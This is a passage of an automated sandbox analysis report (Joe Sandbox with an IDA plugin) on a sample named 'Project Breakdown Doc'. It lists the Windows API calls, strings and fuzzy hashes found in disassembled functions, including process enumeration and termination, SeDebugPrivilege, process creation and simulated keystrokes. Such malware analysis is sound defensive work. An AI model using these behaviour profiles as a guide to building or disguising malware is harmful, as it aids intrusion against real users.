                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 8341e5e44675309ab272caae1699f80e1530ad39accb1ba6c58079f68526f2a8
                                                  • Instruction ID: 681aed16f217f7a8c95f39ad223f50e51fd20345f73a64cde00467c1d9f3ca40
                                                  • Opcode Fuzzy Hash: 8341e5e44675309ab272caae1699f80e1530ad39accb1ba6c58079f68526f2a8
                                                  • Instruction Fuzzy Hash: 34919070A0060AABDF58DF60C485BEEFB74FF04304F518119E99AA7191DF306A99DBD1
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00C42EAE
                                                    • Part of subcall function 00C41DB3: GetClientRect.USER32(?,?), ref: 00C41DDC
                                                    • Part of subcall function 00C41DB3: GetWindowRect.USER32(?,?), ref: 00C41E1D
                                                    • Part of subcall function 00C41DB3: ScreenToClient.USER32(?,?), ref: 00C41E45
                                                  • GetDC.USER32 ref: 00C7CF82
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C7CF95
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C7CFA3
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C7CFB8
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C7CFC0
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C7D04B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 074c266a334fd8e2a2de5152ba0c2f0f0413443ffd3a481d35813700baabdb48
                                                  • Instruction ID: 1bf4e3129e3b6b504acf0ec81cd39cd08c026315d1304ca7ed4a8da613c8f5e8
                                                  • Opcode Fuzzy Hash: 074c266a334fd8e2a2de5152ba0c2f0f0413443ffd3a481d35813700baabdb48
                                                  • Instruction Fuzzy Hash: 2A71A530500205DFCF21CF64CC85AAA7BB6FF49351F14826EFD6A9A2A6C7318D52DB60
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                    • Part of subcall function 00C42344: GetCursorPos.USER32(?), ref: 00C42357
                                                    • Part of subcall function 00C42344: ScreenToClient.USER32(00D067B0,?), ref: 00C42374
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000001), ref: 00C42399
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000002), ref: 00C423A7
                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00CCC2E4
                                                  • ImageList_EndDrag.COMCTL32 ref: 00CCC2EA
                                                  • ReleaseCapture.USER32 ref: 00CCC2F0
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00CCC39A
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CCC3AD
                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00CCC48F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 1924731296-2107944366
                                                  • Opcode ID: d71fcb1ceb86162bc2d1e443a5bcc58a42f11f65c2277a7ef38cff2c0e1e630b
                                                  • Instruction ID: b409711558bdce4f36a1addf75d79c66c34902cfa9a4aaf7c7c129023a9f3544
                                                  • Opcode Fuzzy Hash: d71fcb1ceb86162bc2d1e443a5bcc58a42f11f65c2277a7ef38cff2c0e1e630b
                                                  • Instruction Fuzzy Hash: AC518B70204304AFDB04EF24CC96F6A7BE5FB88314F04852DF5998B2E1CB70A959DB62
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CCF910), ref: 00CB903D
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CCF910), ref: 00CB9071
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CB91EB
                                                  • SysFreeString.OLEAUT32(?), ref: 00CB9215
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 7586346c2f3bb77d5349ea67cd7eb5af8029cd33082c98620419b66427e16782
                                                  • Instruction ID: 0f9ecbf7e6b21391edd5778e5c4c656790be79c01fa9ddfa7a9debd8c88caa12
                                                  • Opcode Fuzzy Hash: 7586346c2f3bb77d5349ea67cd7eb5af8029cd33082c98620419b66427e16782
                                                  • Instruction Fuzzy Hash: 85F1F871A00119EFDB14DF94C888EEEB7B9FF49314F108059F616AB2A1DB31AE46DB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CBF9C9
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFB5C
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFB80
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFBC0
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFBE2
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CBFD5E
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CBFD90
                                                  • CloseHandle.KERNEL32(?), ref: 00CBFDBF
                                                  • CloseHandle.KERNEL32(?), ref: 00CBFE36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 42bdd402921ac8255893e6c67e5db0d19b52c479efd91da77a9b73827ba1dc20
                                                  • Instruction ID: a4588425002f0db9fb5a733f38abc6f0175399316dfaeae2a087db82a0a09b2e
                                                  • Opcode Fuzzy Hash: 42bdd402921ac8255893e6c67e5db0d19b52c479efd91da77a9b73827ba1dc20
                                                  • Instruction Fuzzy Hash: F4E1A2312042419FCB24EF24C891BAABBE1FF85314F14856DF8999B3A2CB31DD46DB52
                                                  APIs
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CA38D3,?), ref: 00CA48C7
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CA38D3,?), ref: 00CA48E0
                                                    • Part of subcall function 00CA4CD3: GetFileAttributesW.KERNEL32(?,00CA3947), ref: 00CA4CD4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00CA4FE2
                                                  • _wcscmp.LIBCMT ref: 00CA4FFC
                                                  • MoveFileW.KERNEL32(?,?), ref: 00CA5017
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: e5998e881c2b7764b1811b06b5545f1cce6211fb051c245d8cf85433dce94b3c
                                                  • Instruction ID: 1c8fdbe4e2a37ebb22899e6187ac438e5a57f13f3369609fd951092b14a7ca63
                                                  • Opcode Fuzzy Hash: e5998e881c2b7764b1811b06b5545f1cce6211fb051c245d8cf85433dce94b3c
                                                  • Instruction Fuzzy Hash: D85197B24087859BC724DBA0CC819DFB3ECAF85345F00492EF299D3191EF74A28C9766
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CC896E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 39a790a6e698ef5c326ce9a2c48193cc71de2f8e2544de20c83a5c3377e8c17a
                                                  • Instruction ID: 652ff205d5ab629869ef53ae9d75430b909ae3c8a794a7c686557c7d3b3f00e6
                                                  • Opcode Fuzzy Hash: 39a790a6e698ef5c326ce9a2c48193cc71de2f8e2544de20c83a5c3377e8c17a
                                                  • Instruction Fuzzy Hash: FE519130600209BFDF309F25CC89FAB7B65BB05320F60415AF525E66E1DF71AE98AB51
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C7C547
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C7C569
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C7C581
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C7C59F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C7C5C0
                                                  • DestroyIcon.USER32(00000000), ref: 00C7C5CF
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C7C5EC
                                                  • DestroyIcon.USER32(?), ref: 00C7C5FB
                                                    • Part of subcall function 00CCA71E: DeleteObject.GDI32(00000000), ref: 00CCA757
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: 1b2a1f7b989a2c7dbaf9f85072bd52435c221e7d9cf9930e3e8cec0f262f0dfa
                                                  • Instruction ID: fa33666dc6d865bba7ccad23d6454ea18b873d3da839b973ec0837c7f2d93e95
                                                  • Opcode Fuzzy Hash: 1b2a1f7b989a2c7dbaf9f85072bd52435c221e7d9cf9930e3e8cec0f262f0dfa
                                                  • Instruction Fuzzy Hash: 13514670600609AFDB24DF25CC86FAA7BB5FB58310F10452CF916972A0DB71EA91EB60
                                                  APIs
                                                    • Part of subcall function 00C9AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9AE77
                                                    • Part of subcall function 00C9AE57: GetCurrentThreadId.KERNEL32 ref: 00C9AE7E
                                                    • Part of subcall function 00C9AE57: AttachThreadInput.USER32(00000000,?,00C99B65,?,00000001), ref: 00C9AE85
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C99B70
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C99B8D
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C99B90
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C99B99
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C99BB7
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C99BBA
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C99BC3
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C99BDA
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C99BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 4db3386303cf0bb23b1866a3d34ede2121ec00ceee85fda89adb4aae6c8d658d
                                                  • Instruction ID: ed7f6e433af41381cffc063d9da651d4891df040921bf24c67d87b551bf59f21
                                                  • Opcode Fuzzy Hash: 4db3386303cf0bb23b1866a3d34ede2121ec00ceee85fda89adb4aae6c8d658d
                                                  • Instruction Fuzzy Hash: F211E171550218BFFB106B64DC8DF6E7B2EEB4C755F110429F244AB0A0C9F35C11DAA4
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C98A84,00000B00,?,?), ref: 00C98E0C
                                                  • HeapAlloc.KERNEL32(00000000,?,00C98A84,00000B00,?,?), ref: 00C98E13
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C98A84,00000B00,?,?), ref: 00C98E28
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00C98A84,00000B00,?,?), ref: 00C98E30
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C98A84,00000B00,?,?), ref: 00C98E33
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C98A84,00000B00,?,?), ref: 00C98E43
                                                  • GetCurrentProcess.KERNEL32(00C98A84,00000000,?,00C98A84,00000B00,?,?), ref: 00C98E4B
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C98A84,00000B00,?,?), ref: 00C98E4E
                                                  • CreateThread.KERNEL32(00000000,00000000,00C98E74,00000000,00000000,00000000), ref: 00C98E68
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: 606d033a454a406ae17c6d23bdcfdc3dd0ebeaa87d8e792d31f2df67658ee303
                                                  • Instruction ID: cc34938e110ad3110d123568e238c4be7cf1730906d05570006c2d07b668992f
                                                  • Opcode Fuzzy Hash: 606d033a454a406ae17c6d23bdcfdc3dd0ebeaa87d8e792d31f2df67658ee303
                                                  • Instruction Fuzzy Hash: 9101A4B5240308FFEA10ABA5DC4DF6F7BADEB89711F044425FA05DB2A1CA70D8018A20
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: d293cd979d9a47b6f0a839793435329e3d5eec9c3fa1259dac8aef4749d919ad
                                                  • Instruction ID: 9c820e7b9ea8d904d3de5b3118ef701a674012def402cb47b5487c6c464e7eb2
                                                  • Opcode Fuzzy Hash: d293cd979d9a47b6f0a839793435329e3d5eec9c3fa1259dac8aef4749d919ad
                                                  • Instruction Fuzzy Hash: 19918E71A00219ABDF24DFA5C848FEFBBB8EF45710F108159F615AB290D7709A45CFA0
                                                  APIs
                                                    • Part of subcall function 00C97652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?,?,00C9799D), ref: 00C9766F
                                                    • Part of subcall function 00C97652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C9768A
                                                    • Part of subcall function 00C97652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C97698
                                                    • Part of subcall function 00C97652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?), ref: 00C976A8
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CB9B1B
                                                  • _memset.LIBCMT ref: 00CB9B28
                                                  • _memset.LIBCMT ref: 00CB9C6B
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00CB9C97
                                                  • CoTaskMemFree.OLE32(?), ref: 00CB9CA2
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00CB9CF0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: 88ed0eb8d58dc8bdf1c218f06d3896abc670125d62c974a6f232a203da26598e
                                                  • Instruction ID: 972760f102bc9eefb18943e6a1868cb8bf69f11df06ee46905ec48b2a5477f71
                                                  • Opcode Fuzzy Hash: 88ed0eb8d58dc8bdf1c218f06d3896abc670125d62c974a6f232a203da26598e
                                                  • Instruction Fuzzy Hash: 76913771D00229ABDF10DFA5DC85ADEBBB9FF08710F20416AF519A7281DB319A45DFA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CC7093
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CC70A7
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CC70C1
                                                  • _wcscat.LIBCMT ref: 00CC711C
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CC7133
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CC7161
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 82cbc03b4913a74b6759e258b0102132843766c1c63e7834515f7134fc85cc63
                                                  • Instruction ID: 3996ad20d53a95c776079e494c5b3cb07e05d890add17892ea3d65a0417027ab
                                                  • Opcode Fuzzy Hash: 82cbc03b4913a74b6759e258b0102132843766c1c63e7834515f7134fc85cc63
                                                  • Instruction Fuzzy Hash: 60418071A04308ABDB219FA4CC85FEE77A9EF08350F10452EF598E7291D7719D859B60
                                                  APIs
                                                    • Part of subcall function 00CA3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00CA3EB6
                                                    • Part of subcall function 00CA3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00CA3EC4
                                                    • Part of subcall function 00CA3E91: CloseHandle.KERNEL32(00000000), ref: 00CA3F8E
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBECB8
                                                  • GetLastError.KERNEL32 ref: 00CBECCB
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBECFA
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CBED77
                                                  • GetLastError.KERNEL32(00000000), ref: 00CBED82
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CBEDB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: d282d5cd8bb8b282d9e63f1d185a73bfaf6a37d61f9b44f0fa6ecc1dd5257017
                                                  • Instruction ID: 233c25b59b1700c3b2e8d3bf8dafbdbe95a06c5a5b7fe986f317c62837bb5a95
                                                  • Opcode Fuzzy Hash: d282d5cd8bb8b282d9e63f1d185a73bfaf6a37d61f9b44f0fa6ecc1dd5257017
                                                  • Instruction Fuzzy Hash: 3441DF702002119FDB14EF24CC95FAEB7A1EF80B14F18841DF8429B3D2CBB4A905EB96
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00CA32C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
